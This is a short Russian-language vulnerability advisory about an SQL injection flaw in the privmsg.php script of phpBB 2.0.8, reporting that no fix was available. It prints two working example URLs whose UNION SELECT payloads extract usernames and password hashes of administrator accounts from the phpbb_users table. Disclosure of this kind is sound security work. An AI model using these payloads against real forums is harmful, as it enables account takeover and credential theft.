Дата публикации: | 29.03.2004 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 12881 |
Опасность: | Высокая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: phpBB 2.0.8
Описание: Уязвимость в проверке правильности входных данных обнаружена в phpBB в 'privmsg.php' сценарии. Удаленный пользователь может внедрить произвольный SQL код. Пример: http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm .privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/* /privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/* URL производителя: http://www.phpbb.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | Critical sql injection bug in PhpBB 2.0.8 |